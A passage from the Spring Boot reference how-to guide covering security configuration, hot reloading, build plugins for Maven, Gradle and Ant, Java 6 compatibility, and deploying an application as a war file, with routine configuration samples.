is to inject it into a void method in a\n`WebSecurityConfigurerAdapter`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Autowired\n\t\tpublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\t\t\tauth.inMemoryAuthentication()\n\t\t\t\t\t.withUser(\"barry\").password(\"password\").roles(\"USER\"); \/\/ ... etc.\n\t\t}\n\n\t\t\/\/ ... other stuff for application security\n\n\t}\n----\n\nYou will get the best results if you put this in a nested class, or a standalone class\n(i.e. not mixed in with a lot of other `@Beans` that might be allowed to influence the\norder of instantiation). The {github-code}\/spring-boot-samples\/spring-boot-sample-web-secure[secure web sample]\nis a useful template to follow.\n\nIf you experience instantiation issues (e.g. using JDBC or JPA for the user detail store)\nit might be worth extracting the `AuthenticationManagerBuilder` callback into a\n`GlobalAuthenticationConfigurerAdapter` (in the `init()` method so it happens before the\nauthentication manager is needed elsewhere), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class AuthenticationManagerConfiguration extends\n\t\t\tGlobalAuthenticationConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(AuthenticationManagerBuilder auth) {\n\t\t\tauth.inMemoryAuthentication() \/\/ ... etc.\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS when running behind a proxy server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you are using Tomcat as a servlet container, then\nSpring Boot will add Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front end proxies. You can switch on the valve\nby adding some entries to `application.properties`, e.g.\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties will switch on the valve. Or you can add the\n`RemoteIpValve` yourself by adding a `TomcatEmbeddedServletContainerFactory` bean.)\n\nSpring Security can also be configured to require a secure channel for all (or some\nrequests). To switch that on in a Spring Boot application you just need to set\n`security.require_ssl` to `true` in `application.properties`.\n\n\n\n[[howto-hotswapping]]\n== Hot swapping\n\n\n\n[[howto-reload-static-content]]\n=== Reload static content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>> as it provides\nadditional development-time features such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (e.g. template caching).\nDevtools works by monitoring the classpath for changes. This means that static resource\nchanges must be \"built\" for the change to take affect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, Make Project will\ntrigger the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources will not trigger a restart of your application.\nThey will, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload templates without restarting the container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (see below for details). If you're using the\n`spring-boot-devtools` module these properties will be\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf templates\nIf you are using Thymeleaf, then set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker templates\nIf you are using FreeMarker, then set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy templates\nIf you are using Groovy templates, then set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast application restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhilst not as fast as technologies such as http:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel]\nor https:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] it's usually\nsignificantly faster than a \"`cold start`\". You should probably give it a try before\ninvestigating some of the more complex reload options discussed below.\n\nFor more details see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java classes without restarting the container\nModern IDEs (Eclipse, IDEA, etc.) all support hot swapping of bytecode, so if you make a\nchange that doesn't affect class or method signatures it should reload cleanly with no\nside effects.\n\nhttps:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] goes a little further in\nthat it can reload class definitions with changes in the method signatures. With some\ncustomization it can force an `ApplicationContext` to refresh itself (but there is no\ngeneral mechanism to ensure that would be safe for a running application anyway, so it\nwould only ever be a development time trick probably).\n\n\n[[howto-reload-springloaded-maven]]\n==== Configuring Spring Loaded for use with Maven\nTo use Spring Loaded with the Maven command line, just add it as a dependency in the\nSpring Boot plugin declaration, e.g.\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework<\/groupId>\n\t\t\t\t<artifactId>springloaded<\/artifactId>\n\t\t\t\t<version>1.2.6.RELEASE<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/plugin>\n----\n\nThis normally works pretty well with Eclipse and IntelliJ IDEA as long as they have their\nbuild configuration aligned with the Maven defaults (Eclipse m2e does this out of the\nbox).\n\n\n\n[[howto-reload-springloaded-gradle-and-intellij-idea]]\n==== Configuring Spring Loaded for use with Gradle and IntelliJ IDEA\nYou need to jump through a few hoops if you want to use Spring Loaded in combination with\nGradle and IntelliJ IDEA. By default, IntelliJ IDEA will compile classes into a different\nlocation than Gradle, causing Spring Loaded monitoring to fail.\n\nTo configure IntelliJ IDEA correctly you can use the `idea` Gradle plugin:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbuildscript {\n\t\trepositories { jcenter() }\n\t\tdependencies {\n\t\t\tclasspath \"org.springframework.boot:spring-boot-gradle-plugin:{spring-boot-version}\"\n\t\t\tclasspath 'org.springframework:springloaded:1.2.6.RELEASE'\n\t\t}\n\t}\n\n\tapply plugin: 'idea'\n\n\tidea {\n\t\tmodule {\n\t\t\tinheritOutputDirs = false\n\t\t\toutputDir = file(\"$buildDir\/classes\/main\/\")\n\t\t}\n\t}\n\n\t\/\/ ...\n\n----\n\nNOTE: IntelliJ IDEA must be configured to use the same Java version as the command line\nGradle task and `springloaded` *must* be included as a `buildscript` dependency.\n\nYou can also additionally enable '`Make Project Automatically`' inside IntelliJ IDEA to\nautomatically compile your code whenever a file is saved.\n\n\n\n[[howto-build]]\n== Build\n\n\n\n[[howto-build-info]]\n=== Generate build information\nBoth the Maven and Gradle plugin allow to generate build information containing\nthe coordinates, name and version of the project. The plugin can also be configured\nto add additional properties through configuration. When such file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: Check the {spring-boot-maven-plugin-site}\/[Spring Boot Maven Plugin documentation]\nfor more details.\n\nAnd to do the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nAdditional properties can be added using the DSL:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo {\n\t\t\tadditionalProperties = [\n\t\t\t\t'foo': 'bar'\n\t\t\t]\n\t\t}\n\t}\n----\n\n\n\n[[howto-git-info]]\n=== Generate git information\n\nBoth Maven and Gradle allow to generate a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. Simply add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.4.17\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the format\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using this format\nallows the time to be parsed into a `Date` and its format when serialized to JSON to be controlled by\nJackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions-with-maven]]\n[[howto-customize-dependency-versions]]\n=== Customize dependency versions\nIf you use a Maven build that inherits directly or indirectly from `spring-boot-dependencies`\n(for instance `spring-boot-starter-parent`) but you want to override a specific\nthird-party dependency you can add appropriate `<properties>` elements. Browse\nthe {github-code}\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version\nyou would add the following:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: This only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>` you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against a specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, you can specify a version as shown below:\n\n[source,groovy,indent=0]\n----\n\text['slf4j.version'] = '1.7.5'\n----\n\nFor additional information, please refer to the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[Gradle Dependency\nManagement Plugin documentation].\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable '`fat`' JAR. If you\nare using the `spring-boot-starter-parent` POM you can simply declare the plugin and\nyour jars will be repackaged:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you are not using the parent POM you can still use the plugin, however, you must\nadditionally add an `<executions>` section:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot application as a dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as dependency.\n\nTo configure a classifier of `exec` in Maven, the following configuration can be used:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd when using Gradle, the following configuration can be used:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRepackage {\n\t\tclassifier = 'exec'\n\t}\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract specific libraries when an executable jar runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run,\nhowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked to the '`temp folder`' when the executable jar first runs.\n\nFor example, to indicate that JRuby should be flagged for unpack using the Maven Plugin\nyou would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd to do that same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\trequiresUnpack = ['org.jruby:jruby-complete']\n\t}\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a non-executable JAR with exclusions\nOften if you have an executable and a non-executable jar as build products, the executable\nversion will have additional configuration files that are not needed in a library jar.\nE.g. the `application.yml` configuration file might excluded from the non-executable JAR.\n\nHere's how to do that in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>exec<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<!-- Need this to ensure application.yml is excluded -->\n\t\t\t\t\t\t\t<forceCreation>true<\/forceCreation>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIn Gradle you can create a new JAR archive with standard task DSL features, and then have\nthe `bootRepackage` task depend on that one using its `withJarTask` property:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tjar {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\texcludes = ['**\/application.yml']\n\t}\n\n\ttask('execJar', type:Jar, dependsOn: 'jar') {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\tclassifier = 'exec'\n\t\tfrom sourceSets.main.output\n\t}\n\n\tbootRepackage {\n\t\twithJarTask = tasks['execJar']\n\t}\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote debug a Spring Boot application started with Maven\nTo attach a remote debugger to a Spring Boot application started with Maven you can use\nthe `jvmArguments` property of the {spring-boot-maven-plugin-site}\/[maven plugin].\n\nCheck {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more details.\n\n\n\n[[howto-remote-debug-gradle-run]]\n=== Remote debug a Spring Boot application started with Gradle\nTo attach a remote debugger to a Spring Boot application started with Gradle you can use\nthe `jvmArgs` property of `bootRun` task or `--debug-jvm` command line option.\n\n`build.gradle`:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRun {\n\t\tjvmArgs \"-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005\"\n\t}\n----\n\n\nCommand line:\n\n[indent=0]\n----\n\t$ gradle bootRun --debug-jvm\n----\n\n\nCheck {gradle-userguide}\/application_plugin.html[Gradle Application Plugin] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an executable archive from Ant without using spring-boot-antlib\nTo build with Ant you need to grab dependencies, compile and then create a jar or war\narchive. To make it executable you can either use the `spring-boot-antlib`\nmodule, or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n `BOOT-INF\/classes` directory. If you are building a war, package the application's\n classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n `WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\n directory for jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\n entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so the `Main-Class`\n is available).\n. Use the appropriate launcher, e.g. `JarLauncher` for a jar file, as a `Main-Class`\n attribute in the manifest and specify the other properties it needs as manifest entries,\n principally a `Start-Class`.\n\nExample:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` with a `manual` task that should work if you run it with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nafter which you can run the application with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-use-java-6]]\n=== How to use Java 6\nIf you want to use Spring Boot with Java 6 there are a small number of configuration\nchanges that you will have to make. The exact changes depend on your application's\nfunctionality.\n\n\n\n[[howto-use-java-6-embedded-container]]\n==== Embedded servlet container compatibility\nIf you are using one of Boot's embedded Servlet containers you will have to use a\nJava 6-compatible container. Both Tomcat 7 and Jetty 8 are Java 6 compatible. See\n<<howto-use-tomcat-7>> and <<howto-use-jetty-8>> for details.\n\n\n\n[[howto-use-java-6-jackson]]\n==== Jackson\nJackson 2.7 and later requires Java 7. If you want to use Jackson with Java 6 you\nwill have to downgrade to Jackson 2.6.\n\nSpring Boot uses the Jackson BOM that was introduced as of Jackson 2.7 so you can't just\noverride the `jackson.version` property. In order to use Jackson 2.6, you will have to\ndefine the individual modules in the `dependencyManagement` section of your build, check\nhttps:\/\/github.com\/{github-repo}\/blob\/0ffc7dc13f6de82c199a6d503354a88c7aaec2d9\/spring-boot-dependencies\/pom.xml#L523-L597[this\nexample] for more details.\n\n\n\n[[how-to-use-java-6-jta-api]]\n==== JTA API compatibility\nWhile the Java Transaction API itself doesn't require Java 7 the official API jar\ncontains classes that have been built to require Java 7. If you are using JTA then\nyou will need to replace the official JTA 1.2 API jar with one that has been built\nto work on Java 6. To do so, exclude any transitive dependencies on\n`javax.transaction:javax.transaction-api` and replace them with a dependency on\n`org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec:1.0.0.Final`\n\n\n\n[[howto-traditional-deployment]]\n== Traditional deployment\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a deployable war file\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. This makes\nuse of Spring Framework's Servlet 3.0 support and allows you to configure your\napplication when it's launched by the servlet container. Typically, you update your\napplication's main class to extend `SpringBootServletInitializer`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) throws Exception {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration so that your project produces a war file\nrather than a jar file. If you're using Maven and using `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you) all you need to do is to modify `pom.xml` to change the\npackaging to war:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you're using Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container doesn't\ninterfere with the servlet container to which the war file will be deployed. To do so, you\nneed to mark the embedded servlet container dependency as provided.\n\nIf you're using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nAnd if you're using Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nNOTE: If you are using a version of Gradle that supports compile only dependencies (2.12\nor later), you should continue to use `providedRuntime`. Among other limitations,\n`compileOnly` dependencies are not on the test classpath so any web-based integration\ntests will fail.\n\nIf you're using the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided will produce an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based example]\nof the above-described configuration.\n\n\n\n[[howto-create-a-deployable-war-file-for-older-containers]]\n=== Create a deployable war file for older servlet containers\nOlder Servlet containers don't have support for the `ServletContextInitializer` bootstrap\nprocess used in Servlet 3.0. You can still use Spring and Spring Boot in these containers\nbut you are going to need to add a `web.xml` to your application and configure it to load\nan `ApplicationContext` via a `DispatcherServlet`.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an existing application to Spring Boot\nFor a non-web application it should be easy (throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`). Spring MVC web applications are generally amenable to first\ncreating a deployable war application, and then migrating it later to an executable war\nand\/or jar. Useful reading is in the http:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nCreate a deployable war by extending `SpringBootServletInitializer` (e.g. in a class\ncalled `Application`), and add the Spring Boot `@SpringBootApplication` annotation.\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is just a Spring `ApplicationContext` and\nnormally anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working first.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. Same for `messages.properties` (Spring Boot\ndetects this automatically in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application, using other servlets or filters\nfor instance, then you may need to add some configuration to your `Application` context,\nreplacing those elements from the `web.xml` as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\n container as if it was a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (like a\n `<filter\/>` and `<filter-mapping\/>`.\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\n your `Application`. Or simple cases where annotation configuration is heavily used\n already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war is working we make it executable by adding a `main` method to our\n`Application`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and the `main` method, something like:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new 